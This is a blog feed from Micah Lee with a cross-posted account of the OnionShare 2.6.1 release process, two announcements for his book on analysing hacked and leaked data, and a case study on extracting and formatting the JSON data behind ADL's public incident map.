feed.xmlurn:uuid:56d41380-d242-312c-a7ee-322f4203756a2024-02-29T00:00:00ZOnionShare 2.6.1 released, and I wasn't even the one who did it!2024-02-29T00:00:00ZMicah Lee, Saptak Senguptaurn:uuid:369a8643-0a2d-3ad3-a134-e8d5bb28a4d1<p>I'm excited to announce that OnionShare 2.6.1 is released — this version includes support for Apple Silicon Macs, among <a href="https://github.com/onionshare/onionshare/releases/tag/v2.6.1">other things</a> — and I'm even more excited that <a href="https://github.com/saptaks">Saptak Sengupta</a>, one of the talented OnionShare maintainers, put in all the work required to make the release, instead of me! Go check out the new version of OnionShare at <a href="https://onionshare.org">onionshare.org</a>.</p>
<p>The following is a cross-post of Saptak's post about making this release, originally published on <a href="https://saptaks.blog/posts/making-my-first-onionshare-release.html">his blog</a>. My favorite part:</p>
<blockquote><p>I was almost sure that since Micah had just made a dev release, most things would go smoothly. But my big mistake was not learning from the pain in Micah's blog.</p>
</blockquote>
<hr>
<h1 id="making-my-first-onionshare-release">Making my first OnionShare release</h1><p><em>By Saptak Sengupta, posted: 2024-02-29T18:11:14+05:30</em></p>
<p>One of the biggest bottlenecks in maintaining the <a href="https://onionshare.org/">OnionShare</a> desktop application has been packaging and releasing the tool. Since OnionShare is a cross-platform tool, we need to ensure that each release works across many different desktop operating systems. To learn more about the pain that goes into making an OnionShare release, read the blog posts[<a href="https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release/">1</a>][<a href="https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release-part-2/">2</a>][<a href="https://micahflee.com/2023/10/what-goes-into-making-an-onionshare-release-part-3/">3</a>] that <a href="https://micahflee.com/">Micah Lee</a> wrote on this topic.</p>
<p>However, one other big bottleneck in our release process, apart from all the technical difficulties, is that Micah has always been the one making the releases; even though the other maintainers are aware of the process, we have never actually made a release ourselves. Hence, to mitigate that, we decided that I would be making the OnionShare 2.6.1 release.</p>
<p>PS: Since Micah has written pretty detailed blog posts with code snippets, I am not going to include many code snippets (unless I made significant changes) so as not to lengthen this already long blog further. I am going to keep this blog more like a narrative of my experience.</p>
<h2 id="getting-the-hardwares-ready">Getting the hardware ready</h2><p>Firstly, given the threat model of OnionShare, we decided that it is always good to have a clean machine to do the OnionShare release work, especially the signing part of things. Micah has already automated much of the release process using GitHub Actions over the years, but we still need to build the Apple Silicon version of OnionShare manually and then merge it with the Intel version to create a universal2 app bundle.</p>
<p>Also, in general, it's good practice to keep and use the signing keys on a clean machine for a project as sensitive as OnionShare, which is used by people with high threat models. So I decided to get a new MacBook for this purpose. This would help me build the Apple Silicon version as well as sign the packages for the other operating systems.</p>
<p>Also, I received the HARICA signing keys from Glenn Sorrentino that are needed for signing the Windows releases.</p>
<h2 id="fixing-the-bugs-merging-the-prs">Fixing the bugs, merging the PRs</h2><p>After the 2.6.1-dev release was created, we noticed some bugs that we wanted to fix before making the 2.6.1 release. We fixed, reviewed, and merged most of those fixes. Also, there were a few older PRs and documentation changes from contributors that I wanted merged before making the release.</p>
<h2 id="translations">Translations</h2><p>Localization is an important part of OnionShare, since it enables users to use OnionShare in the language they are most comfortable with. There were quite a few translation PRs. Also, <a href="https://github.com/emmapeel2">emmapeel2</a>, who always helps us with Weblate wizardry, made certain changes to the setup, which I also wanted to include in this release.</p>
<p>After creating the release PR, I also needed to check which languages were more than 90% translated, make a push to hopefully get a few more languages past that threshold, and finally make the OnionShare release with only the languages that crossed it.</p>
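<p>The threshold check itself is simple to script. A minimal sketch, assuming translation coverage is available as a mapping from locale code to percentage (the numbers below are hypothetical, not real Weblate data):</p>

```python
# Sketch: keep only languages whose translation coverage crosses a threshold.
# The coverage numbers below are hypothetical examples, not real Weblate data.
def languages_above_threshold(coverage, threshold=90.0):
    """coverage maps a locale code to its translated percentage."""
    return sorted(code for code, pct in coverage.items() if pct >= threshold)

coverage = {"de": 100.0, "fr": 97.3, "es": 91.5, "it": 42.0, "ja": 89.9}
print(languages_above_threshold(coverage))  # ['de', 'es', 'fr']
```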
<h2 id="making-the-release-pr">Making the Release PR</h2><p>And, then I started making the release PR. I was almost sure that since Micah had just made a dev release, most things would go smoothly. But my big mistake was not learning from the pain in Micah's blog.</p>
<h3 id="updating-dependencies-in-snapcraft">Updating dependencies in Snapcraft</h3><p>Updating the poetry dependencies went pretty smoothly.</p>
<p>There was nothing much to update in the pluggable transport scripts either.</p>
<p>But then I started updating and packaging for Snapcraft and Flatpak. Updating the tor version to the latest went pretty smoothly. In snapcraft, the Python dependencies needed to be compared manually against <code>pyproject.toml</code>. I definitely feel like we should automate this process in the future, but for now, it wasn't too bad.</p>
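<p>That manual comparison could plausibly be automated along these lines. A sketch, assuming both sides are available as plain "name==version" pins (the package names and versions here are made up for illustration):</p>

```python
# Sketch of automating the manual check: diff pinned requirements from
# pyproject.toml against the python packages listed in snapcraft.yaml.
# Package names and versions are hypothetical examples.
def parse_pins(entries):
    """Turn ["foo==1.2", "bar==3.4"] into {"foo": "1.2", "bar": "3.4"}."""
    return dict(entry.split("==", 1) for entry in entries)

def diff_pins(pyproject_entries, snapcraft_entries):
    wanted = parse_pins(pyproject_entries)
    packaged = parse_pins(snapcraft_entries)
    missing = sorted(set(wanted) - set(packaged))   # not packaged at all
    stale = sorted(name for name in wanted.keys() & packaged.keys()
                   if wanted[name] != packaged[name])  # packaged, wrong version
    return missing, stale

missing, stale = diff_pins(
    ["flask==2.3.2", "stem==1.8.1", "waitress==2.1.2"],
    ["flask==2.2.0", "stem==1.8.1"],
)
print(missing)  # ['waitress']
print(stale)    # ['flask']
```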
<p>But trying to build the snap with <code>snapcraft</code> locally just was not working on my system. I kept getting <code>lxd</code> errors that I was not sure how to deal with. I decided to move ahead with Flatpak packaging and discuss the snapcraft issue with Micah later. I was satisfied that at least it was building through GitHub Actions.</p>
<h3 id="updating-dependencies-in-flatpak">Updating dependencies in Flatpak</h3><p>Even though I read about the hardship that Micah went through updating the pluggable transports and Python dependencies in the Flatpak packaging, I didn't learn my lesson. I decided to give it a try. I tried updating the pluggable transports and faced the same issue that Micah did. I tried modifying the tool, even manually updating the commits, but something or the other kept failing.</p>
<p>Then I moved on to updating the Python dependencies for Flatpak. The generator code that Micah wrote for the desktop dependencies worked perfectly, but the CLI gave me pain. The format in which the dependencies were being generated did not match the existing format. And I didn't want to be too brave and change the format, since Flatpak isn't my area of expertise. But Python kind of is. So I decided to check whether I could update the <code>flatpak-poetry-generator.py</code> script to make it work. And I managed to fix it!</p>
<p>That helped me update the dependencies in flatpak.</p>
<h2 id="macos-and-windows-signing-fun">macOS and Windows signing fun!</h2><h3 id="creating-apple-silicon-app-bundle">Creating Apple Silicon app bundle</h3><p>As mentioned before, we still need to create an Apple Silicon bundle and then merge it with the Intel build generated from CI to get the universal2 app bundle. Before doing that, I needed to install the poetry dependencies, the tor dependencies, and the pluggable transport dependencies.</p>
<h4 id="and-i-hit-an-issue-again-our-get-tor-py-script-is-not-working">And I hit an issue again: our get-tor.py script is not working.</h4><p>The script failed to verify the Tor Browser version that we were downloading. This has happened before, and I suspected that the Tor PGP signing key must have expired. I tried verifying manually, and it seems that was the case: the subkey used for signing had expired. So I <a href="https://support.torproject.org/tbb/how-to-verify-signature/">downloaded the new Tor Browser Developers signing key</a>, created a PR, and then I could download tor again.</p>
<p>Once that was done, I just needed to run:</p>
<pre><code>/Library/Frameworks/Python.framework/Versions/3.11/bin/poetry run python ./setup-freeze.py bdist_mac
rm -rf build/OnionShare.app/Contents/Resources/lib
mv build/exe.macosx-10.9-universal2-3.11/lib build/OnionShare.app/Contents/Resources/
/Library/Frameworks/Python.framework/Versions/3.11/bin/poetry run python ./scripts/build-macos.py cleanup-build
</code></pre>
<p>And amazingly, it built successfully on the very first try! That was easy! Now I just needed to merge the Intel app bundle and the Silicon app bundle, and everything should work (spoiler alert: it doesn't!).</p>
<p>Once the app bundle was created, it was time to sign and notarize. However, the process was a little difficult for me to do since Micah had previously used an individual account. So I passed the universal2 bundle on to him and moved on to the signing work on Windows.</p>
<h3 id="signing-the-windows-package">Signing the Windows package</h3><p>I had to boot into my Windows 11 VM to finish the signing and make the Windows release. Since this was the first time I was doing the release, I first had to get my VM ready by <a href="https://github.com/onionshare/onionshare/blob/main/RELEASE.md#windows-release">installing all the dependencies</a> needed for signing and packaging. I am not super familiar with the Windows development environment, so I had to figure out adding things to PATH and other such details to make all the dependencies work. The next step was setting up the HARICA smart card.</p>
<h4 id="setting-up-the-harica-smart-card">Setting up the HARICA smart card</h4><p>Thankfully, Micah had already done this before so he was able to help me out a bit. I had to log into the control panel, download and import certificates to my smart card and change the token password and administrator password for my smart card. Apart from the UI of the SafeNet client not being the best, everything else went mostly smoothly.</p>
<p>Since Micah had already made some changes to fix the code signing and packaging, it went pretty smoothly for me and I didn't face many obstructions. <a href="https://scidsg.org/">Science & Design</a>, founded by Glenn Sorrentino (who designed the beautiful OnionShare UX!), has taken on the role of fiscal sponsor for OnionShare, and hence the package now gets signed under the name <code>Science and Design Inc.</code></p>
<p>Meanwhile, Micah got back to me saying that the universal2 bundle didn't work.</p>
<h3 id="so-the-apple-silicon-bundle-didn-t-work">So, the Apple Silicon bundle didn't work</h3><p>One of the mistakes I made was not testing my Apple Silicon build. I thought I would test it once it was signed and notarized. However, Micah confirmed that even after signing and notarizing, the universal2 build was not working. It kept giving a <code>segmentation fault</code>. Time to get back to debugging.</p>
<h4 id="downgrading-cx-freeze-to-6.15.9">Downgrading cx-freeze to 6.15.9</h4><p>The first thought that came to my mind was that Micah had made a dev build in October 2023, so the cx-freeze release from that time should still build correctly. So I decided to try <code>build</code> (instead of <code>bdist_mac</code>) with the cx-freeze version from that time (which was <code>6.15.9</code>) and check whether the resulting binary worked. And thankfully, it did. I tried with <code>6.15.10</code> and it didn't. So I decided to stick with <code>6.15.9</code>.</p>
<p>So let's try running <code>bdist_mac</code>, create a <code>.app</code> bundle, and hopefully everything will work perfectly! But nope! The command failed with <code>OnionShare.app/Contents/MacOS/frozen_application_license.txt: No such file or directory</code>. So now I had a decision to make: should I monkey-patch this and just figure out how to fix it, or try to make the latest cx-freeze work? I decided to give the latest cx-freeze (version <code>6.15.15</code>) another try.</p>
<h4 id="trying-zip-include-packages">Trying zip_include_packages</h4><p>So, one thing I noticed we were doing differently from what the cx-freeze documentation and PySide6 examples suggest: we put our dependencies in <code>packages</code> instead of <code>zip_include_packages</code> in the setup options.</p>
<pre><code> "build_exe": {
"packages": [
"cffi",
"engineio",
"engineio.async_drivers.gevent",
"engineio.async_drivers.gevent_uwsgi",
"gevent",
"jinja2.ext",
"onionshare",
"onionshare_cli",
"PySide6",
"PySide6.QtCore",
"PySide6.QtGui",
"PySide6.QtWidgets",
],
"excludes": [
"test",
"tkinter",
...
],
...
}
</code></pre>
<p>So I thought, let's try moving all of the dependencies from <code>packages</code> into <code>zip_include_packages</code>. Basically, <code>zip_include_packages</code> includes the dependencies in the zip file, whereas <code>packages</code> places them in the file system rather than the zip file. My guess was that the requirements for how an Apple Silicon <code>.app</code> bundle should be structured had changed. So the new options looked something like this:</p>
<pre><code> "build_exe": {
"zip_include_packages": [
"cffi",
"engineio",
"engineio.async_drivers.gevent",
"engineio.async_drivers.gevent_uwsgi",
"gevent",
"jinja2.ext",
"onionshare",
"onionshare_cli",
"PySide6",
"PySide6.QtCore",
"PySide6.QtGui",
"PySide6.QtWidgets",
],
"excludes": [
"test",
"tkinter",
...
],
...
}
</code></pre>
<p>So I created a build with that, ran the binary, and it gave an error. But I was happy, because it wasn't a <code>segmentation fault</code>. The error was mainly because the binary was not able to import some functions from <code>onionshare_cli</code>. So as a next step, I decided to move everything apart from <code>onionshare</code> and <code>onionshare_cli</code> to <code>zip_include_packages</code>. It looked something like this:</p>
<pre><code> "build_exe": {
"packages": [
"onionshare",
"onionshare_cli",
],
"zip_include_packages": [
"cffi",
"engineio",
"engineio.async_drivers.gevent",
"engineio.async_drivers.gevent_uwsgi",
"gevent",
"jinja2.ext",
"PySide6",
"PySide6.QtCore",
"PySide6.QtGui",
"PySide6.QtWidgets",
],
"excludes": [
"test",
"tkinter",
...
],
...
}
</code></pre>
<p>This almost worked. The problem was that PySide 6.4 had changed <a href="https://www.qt.io/blog/qt-for-python-release-6.4-is-finally-here">how it deals with enums</a> and we were still using deprecated code. Fixing the deprecations would take a lot of time, so I decided to <a href="https://github.com/onionshare/onionshare/issues/1881">create an issue</a> for it and deal with it after the release.</p>
<p>At this point, I was pretty frustrated, so I decided to do what I didn't want to do: have the dependencies in both <code>packages</code> and <code>zip_include_packages</code>. So I did that, built the binary, and it worked. I decided to make the <code>.app</code> bundle. It worked perfectly as well! Great!</p>
<p>I was a little worried that adding the dependencies to both <code>packages</code> and <code>zip_include_packages</code> might increase the size of the bundle, but surprisingly, it actually decreased the size compared to the dev build. So that's nice! I also realized that I no longer needed to replace the <code>lib</code> directory inside the <code>.app</code> bundle. I ran the cleanup code, hit some <code>FileNotFoundError</code> exceptions, tried to find whether the files were now in a different location, couldn't find them, and decided to put the removals in a <code>try-except</code> block.</p>
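<p>That cleanup fix amounts to tolerating paths that the new cx-freeze layout no longer produces. A minimal sketch (the file names are hypothetical examples, not the actual build layout):</p>

```python
# Sketch of the cleanup change: skip files that the new cx-freeze layout
# no longer generates instead of crashing. File names are hypothetical.
import os
import tempfile

def remove_if_present(paths):
    removed = []
    for path in paths:
        try:
            os.remove(path)
            removed.append(path)
        except FileNotFoundError:
            # The file moved or is no longer generated; skip it.
            pass
    return removed

# Quick demonstration with throwaway files:
with tempfile.TemporaryDirectory() as d:
    real = os.path.join(d, "frozen_application_license.txt")
    open(real, "w").close()
    gone = os.path.join(d, "no-longer-generated.txt")
    print(remove_if_present([real, gone]) == [real])  # True
```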
<p>After that, I merged the silicon bundle with Intel bundle to create the universal2 bundle again, sent to Micah for signing, and seems like everything worked!</p>
<h2 id="creating-pgp-signature-for-all-the-builds">Creating PGP signatures for all the builds</h2><p>Now that we had all the build files ready, I tried installing and running them all, and everything seemed to be working fine. Next, I needed to generate a PGP signature for each of the build files and then create a GitHub release. However, Micah is the one who has always created the signatures. So our options were:</p>
<ul>
<li>create an OnionShare GPG key that everyone uses</li>
<li>sign with my GPG key and update the documentation to reflect that</li>
</ul>
<p>The issue with creating a new OnionShare GPG key was distribution: the maintainers of OnionShare are spread across timezones and continents. So we decided to create the signatures with my GPG key and update the documentation on how to verify the downloads.</p>
<h2 id="concluding-the-release">Concluding the release</h2><p>Once the signatures were done, the next steps were mostly straightforward:</p>
<ul>
<li>Create a GitHub release</li>
<li>Publish onionshare-cli on PyPI</li>
<li>Push the build and signatures to the onionshare.org servers and update the website and docs</li>
<li>Create PRs in Flathub and Homebrew cask</li>
<li>Promote the snapcraft release from edge to stable</li>
</ul>
<p>The above went pretty smoothly without much difficulty. Once everything was merged, it was time to make an announcement. Since Micah has been doing the announcements, we decided to stick with that for this release so that it reaches more people.</p>
How to buy Hacks, Leaks, and Revelations, and how to get it for free2024-01-09T00:00:00ZMicah Leeurn:uuid:6b1a5b35-de2c-347b-b678-30ff72719b4c<p>Today, my book <em><a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</a></em> is available for sale wherever books are sold! My goal with this book is to teach journalists, researchers, and activists all the skills they need to download and analyze any datasets they get their hands on, finding all of the juicy revelations they might contain. No prior experience is required. You can think of following along with my book as taking a complete course where you'll download real leaked datasets, and then (by following alongside the exercises) learn the tools and coding required to analyze them.</p>
<p>The paperback costs about $50 and the ebook costs about $40. However, I don't want the price to be a barrier to access to anyone who needs this information. For this reason, I also decided to release the book under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0) license. In other words, I'm giving away the book online for free.</p>
<h1 id="how-to-buy-hacks-leaks-and-revelations">How to buy <em>Hacks, Leaks, and Revelations</em></h1><p>Here are a few ways you can buy a copy of my book:</p>
<ul>
<li><strong>Buy directly from the publisher:</strong> If you order the book <a href="https://nostarch.com/hacks-leaks-and-revelations">directly from No Starch Press</a>, you can get <em>25% off until January 15 using the discount code <strong>HLR25</strong>.</em> No Starch sells physical books and ebooks, and the physical book comes with the ebook for free.</li>
<li><strong>Buy from your local indie bookshop:</strong> If you have a local independent bookshop you like, go in and let them know you want to buy my book. They can order a copy of it for you, and they get some of the money.</li>
<li><strong>Buy from Bookshop.org to support indie bookshops:</strong> If you order online <a href="https://bookshop.org/a/100026/9781718503120">from Bookshop.org</a>, they'll ship it to you and a portion of the profit will go towards indie bookshops.</li>
<li><strong>Buy from Amazon, if you must:</strong> If you really want to get it from Amazon, it's available there too (like everything else). Here's the <a href="https://amzn.to/3NboS6c">Kindle book</a>, and here's the <a href="https://amzn.to/46M5P9R">print book</a>.</li>
</ul>
<h1 id="how-to-get-it-for-free">How to get it for free</h1><p>You can read <em>Hacks, Leaks, and Revelations</em> in its entirety on the book's website. <a href="https://hacksandleaks.com/contents.html">Start reading here</a>, at the table of contents. Enjoy!</p>
<p>If you find my book useful and enjoyable, and can afford it, consider buying a copy. The physical book is a lot nicer to read than the online version, and if you buy the ebook you can get it in PDF, EPUB, and MOBI formats, allowing you to read it on ebook readers.</p>
<h1 id="other-ways-to-help">Other ways to help</h1><p>If you want to support <em>Hacks, Leaks, and Revelations</em> and get more people to read it, here are some things you can do:</p>
<ul>
<li><strong>Ask your local library to get it:</strong> I did this myself and it was easy! Go to your public library, talk to a librarian, and request that they get a copy of the book. The ISBN-13 number is 978-1718503120. With any luck, it will show up on the shelves there. If you're a student, you can try the same at your school library.</li>
<li><strong>Goodreads:</strong> If you use Goodreads, head over to my book's <a href="https://www.goodreads.com/book/show/121019646-hacks-leaks-and-revelations">Goodreads page</a> and mark it as "Want to Read," or as "Reading" if you have a copy. Once you're done, give it a rating and review. The more people do these things, the more the Goodreads recommendation algorithm will show it to others.</li>
<li><strong>Amazon:</strong> Give my book a rating and/or review <a href="https://amzn.to/46M5P9R">on Amazon</a>. This will make it rise in the rankings, more people will be exposed to it, and so forth.</li>
</ul>
<p><em>Update January 14: Instead of offering a PDF download, I've made the entire book available on the website at <a href="https://hacksandleaks.com/">hacksandleaks.com</a>.</em></p>
Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data2023-12-05T00:00:00ZMicah Leeurn:uuid:30767d7c-bec3-3173-94dd-4a9824e80090<p>After just about two years of writing, hacking, analyzing, writing some more, and editing, I'm ridiculously excited to announce that I'm now a published author! As of today, my book <em><a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations</a></em> is <a href="https://hacksandleaks.com/buy.html">for sale</a>.</p>
<p>Technically, the official release date is January 9, 2024, but it ships today if you <a href="https://nostarch.com/hacks-leaks-and-revelations">order it directly from the publisher,</a> No Starch Press (the physical book includes the DRM-free ebook too). If you order it from anywhere else, like <a href="https://bookshop.org/p/books/hacks-leaks-and-revelations/18834681">bookshop.org to support independent bookshops</a>, or Amazon if you want <a href="https://amzn.to/3NboS6c">the Kindle version</a>, it will be available January 9.</p>
<p>If you're considering getting this book, now would be a great time to buy it. These initial sales will go a long way in showing that there's interest in the book. Bookshops will take this as a good sign that they should have copies on their shelves, it's more likely to appear higher up on new release lists, and so forth.</p>
<p>So what's this book about anyway? Here's an excerpt from the <a href="https://hacksandleaks.com/introduction.html">introduction</a>:</p>
<blockquote><p>Unlike any other point in history, hackers, whistleblowers, and archivists now routinely make off with terabytes of data from governments, corporations, and extremist groups. These datasets often contain gold mines of revelations in the public interest, and in many cases are freely available for anyone to download. Yet these digital tomes can prove extremely difficult to analyze or interpret, and few people today have the skills to do so.</p>
<p>I wrote this book for journalists, researchers, hacktivists, and anyone else who wants to learn the technologies and coding skills required to investigate these troves of hacked or leaked data. I don’t assume any prior knowledge. Along with lessons on programming and technical tools, I’ve incorporated many anecdotes and firsthand tips from the trenches of investigative journalism. In a series of hands-on projects, you’ll work with real datasets, including those from police departments, fascist groups, militias, a Russian ransomware gang, and social networks. Throughout, you’ll engage head-on with the dumpster fire that is 21st-century current events: the rise of neofascism and the rejection of objective reality, the extreme partisan divide, and an internet overflowing with misinformation.</p>
<p>By the end of the book, you’ll have gained the skills to download and analyze your own datasets, extracting the revelations they contain and transforming previously unintelligible information into your own groundbreaking reports.</p>
</blockquote>
<p>In October, I gave a talk about this book to a room full of hackers at BSides Portland. If you're interested in learning more before diving in, check out a recording of the talk:</p>
<iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/3p7I1qRYjOs?si=TJFzy0-zE7sRq_8c" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe><p>If you'd like to buy <em>Hacks, Leaks, and Revelations</em>, here are your options:</p>
<ul>
<li><a href="https://nostarch.com/hacks-leaks-and-revelations">Buy now from the publisher</a> (includes a print book and a free ebook)</li>
<li><a href="https://bookshop.org/p/books/hacks-leaks-and-revelations/18834681">Pre-order from bookshop.org</a> (supports local bookshops, ships January 9)</li>
<li><a href="https://amzn.to/3NboS6c">Pre-order for Kindle</a> (if you like reading on your Kindle, delivers January 9)</li>
</ul>
CASE STUDY: Extracting data from ADL's "Antisemitic Incidents and Anti-Israel Rallies" map2023-11-13T00:00:00ZMicah Leeurn:uuid:6e1583dc-6278-3afe-98b6-4bb4a42f95e0<p>On Saturday, I <a href="https://theintercept.com/2023/11/11/palestine-israel-protests-ceasefire-antisemitic/">published an article</a> for The Intercept about how the Anti-Defamation League has included dozens of Gaza ceasefire protests that were organized by progressive Jews in <a href="https://www.adl.org/stand-with-israel">its map</a> of "antisemitic incidents and anti-Israel rallies," alongside genuine antisemitic vandalism, harassment, and assault by neo-Nazis.</p>
<p>ADL doesn't publish its raw data, but I managed to get it anyway while doing this reporting. In the spirit of sharing data journalism skills, I will show you exactly how I extracted it from the map.</p>
<p><img src="grand-central-station.jpg" alt="Thousands of Jews protesting ceasefire">
<em>Several thousand Jews and their allies occupied Grand Central Station on October 27 demanding a ceasefire in Gaza -- the largest sit-in in NYC since the Iraq War protests. This is one of the "anti-Israel rallies" that ADL put on its map alongside neo-Nazi hate. Credit: <a href="https://www.instagram.com/p/Cy67JZoAcsI/">@jewishvoiceforpeace on Instagram</a></em></p>
<p>In my article I wrote:</p>
<blockquote><p>While ADL doesn’t distribute its raw data in a usable format, when you load the map in a web browser, behind the scenes your browser downloads a copy of it. By monitoring what my browser downloaded while loading the map, I was able to extract a copy of the data and save it as a spreadsheet. The raw data is full of duplicates. After de-duplicating it, I ended up with a spreadsheet with 1,163 “antisemitic incidents and anti-Israel rallies.”</p>
</blockquote>
<p>In this post I explain how I found the data in the HTML of ADL's map in JSON format, how I converted it into a spreadsheet, and how I de-duplicated this spreadsheet, including with the help of the AI systems GitHub Copilot and ChatGPT's GPT-4. If you follow along, you'll end up with a usable copy of ADL's dataset yourself.</p>
<p>While I'm at it, I'll point to the different chapters in my book <em><a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations</a></em> that provide further reading for each topic. (The official release date of my book is in early January 2024, but if you're in the U.S. and order it directly from the publisher, they should start shipping it at the end of this month.)</p>
<p>You can find ADL's map here: <a href="https://www.adl.org/stand-with-israel">https://www.adl.org/stand-with-israel</a></p>
<h2 id="downloading-adl-s-map-data">Downloading ADL's map data</h2><p>If you load ADL's Stand With Israel page and scroll down, you'll find the map full of data points. Using my browser's web developer tools, I could quickly see that the map itself is an iframe:</p>
<p><img src="adl-iframe.png" alt="Firefox developer tools showing that the ADL map is an iframe"></p>
<p>The iframe is loaded from this URL: <a href="https://flo.uri.sh/visualisation/15425214/embed?auto=1&faIframeUniqueId=ov1dxrbrqr&jsid=null&hostURL=https%3A%2F%2Fwww.adl.org%2Fstand-with-israel">https://flo.uri.sh/visualisation/15425214/embed?auto=1&faIframeUniqueId=ov1dxrbrqr&jsid=null&hostURL=https%3A%2F%2Fwww.adl.org%2Fstand-with-israel</a></p>
<p>If you load that URL directly, you'll see just the map, with all of ADL's data visualized on it:</p>
<p><img src="adl-map.png" alt="The web page for ADL's map, loaded from flo.uri.sh"></p>
<p>If you view the source, you'll see that the HTML includes JavaScript which has a copy of the raw data in it, in the variable <code>_Flourish_data</code>:</p>
<p><img src="adl-view-source.png" alt="The HTML source code of the map"></p>
<p>This HTML page scrolls horizontally -- there is a <em>lot</em> of data here, all stored in that one variable. Let's take a look at it in a text editor where I can turn on word wrapping. First, I download a copy of the HTML by using <code>wget</code> in a terminal:</p>
<div class="hll"><pre><span></span>wget<span class="w"> </span>-O<span class="w"> </span>map.html<span class="w"> </span><span class="s2">"https://flo.uri.sh/visualisation/15425214/embed?auto=1&faIframeUniqueId=ov1dxrbrqr&jsid=null&hostURL=https%3A%2F%2Fwww.adl.org%2Fstand-with-israel"</span>
</pre></div>
<p>This command downloads that URL and saves it in the file <code>map.html</code>. Then, I can open it in Visual Studio Code by running:</p>
<div class="hll"><pre><span></span>code<span class="w"> </span>map.html
</pre></div>
<p>Chapters 3 and 4 of my book introduce you to using the terminal, and the <code>wget</code> command, to do work just like this. The book is designed for beginners who have never touched the command line before, and might even be scared of it. It also shows you how to start working with VS Code as a text editor.</p>
<p>After downloading it, I can tell that <code>map.html</code> is about 1MB, and most of this disk space is used up by giant JSON objects defined inside the JavaScript. Here's a screenshot of viewing <code>map.html</code> in VS Code:</p>
<p><img src="map-html-vscode.png" alt="Viewing map.html in VS Code"></p>
<h2 id="viewing-the-json-data">Viewing the JSON data</h2><p>You can already tell that the raw data is here, but it's incredibly difficult to read. To make it easier, I'll copy line 30 (which is the line that sets the variable <code>_Flourish_data</code> to a huge JSON object) to my clipboard and paste it into its own file. This line starts with:</p>
<pre><code>_Flourish_data = {"lines":[],"points":[{"color":"Assault","lat":32.7241,"lon":-117.171,"metadata":["10/7/2023","An individual wearing jewelry with Jewish symbols was allegedly assaulted by an attacker who grabbed their necklace and ring and shouted antisemitic statements."
</code></pre>
<p>I deleted the <code>_Flourish_data =</code> at the beginning, so that this file contains nothing but JSON data, and now starts like this:</p>
<pre><code>{"lines":[],"points":[{"color":"Assault","lat":32.7241,"lon":-117.171,"metadata":["10/7/2023","An individual wearing jewelry with Jewish symbols was allegedly assaulted by an attacker who grabbed their necklace and ring and shouted antisemitic statements."
</code></pre>
<p>I then saved this file as <code>data.json</code>. In the bottom-right of the VS Code window it says "JSON," which means that my text editor thinks this is a JSON file. With the <code>data.json</code> tab selected, I press Command-Shift-P, type "format document", press enter, and save. This formats the JSON document with spacing that makes it reasonable for humans to read.</p>
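<p>The copy-paste step can also be scripted. A sketch that pulls the variable out of <code>map.html</code>, assuming the assignment sits on a single line as it does in the downloaded page (the sample HTML below is a made-up stand-in, not the real file):</p>

```python
# Sketch: extract the _Flourish_data JSON from the downloaded HTML without
# the manual copy-paste. Assumes the assignment is on one line, terminated
# by ";" or a newline. The sample string below is a made-up stand-in.
import json
import re

def extract_flourish_data(html):
    match = re.search(r"_Flourish_data\s*=\s*(\{.*?\})\s*[;\n]", html)
    if match is None:
        raise ValueError("_Flourish_data not found")
    return json.loads(match.group(1))

html = 'var _Flourish_data = {"lines": [], "points": [{"color": "Assault"}]};'
data = extract_flourish_data(html)
print(len(data["points"]))  # 1
```

Writing the result back out with <code>json.dump(data, f, indent=2)</code> would give you roughly the same human-readable <code>data.json</code> that the "format document" step produces.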
<p>After formatting, it takes up 23,267 lines (at least it does for me right now as I'm writing this -- ADL is continually adding data to their map, so there will likely be more lines for you if you follow along). Here's how it starts:</p>
<div class="hll"><pre><span></span><span class="p">{</span>
<span class="w"> </span><span class="nt">"lines"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span>
<span class="w"> </span><span class="nt">"points"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"color"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Assault"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"lat"</span><span class="p">:</span><span class="w"> </span><span class="mf">32.7241</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"lon"</span><span class="p">:</span><span class="w"> </span><span class="mf">-117.171</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"metadata"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"10/7/2023"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"An individual wearing jewelry with Jewish symbols was allegedly assaulted by an attacker who grabbed their necklace and ring and shouted antisemitic statements."</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"San Diego"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"California"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"Assault"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"No"</span>
<span class="w"> </span><span class="p">],</span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"10/7/2023"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"value"</span><span class="p">:</span><span class="w"> </span><span class="p">[]</span>
<span class="w"> </span><span class="p">},</span>
</pre></div>
<p>This is what formatted JSON data looks like.</p>
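<p>If you'd rather not use VS Code's formatter, the same formatting can be done with Python's built-in <code>json</code> module. This is just a sketch on a tiny stand-in for the start of <code>_Flourish_data</code>; the real file is about 1MB:</p>

```python
import json

# A tiny stand-in for the start of _Flourish_data (the real object is much larger)
raw = '{"lines":[],"points":[{"color":"Assault","lat":32.7241,"lon":-117.171}]}'

# Parse the compact JSON, then re-serialize it with human-readable indentation
data = json.loads(raw)
formatted = json.dumps(data, indent=2)
print(formatted)
```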
<p>Chapter 11 of my book teaches you how to work with data in the JSON file format, using the Parler dataset of over a million videos uploaded to the far-right social networking site Parler, including thousands of videos of the January 6, 2021, insurrection at the US Capitol.</p>
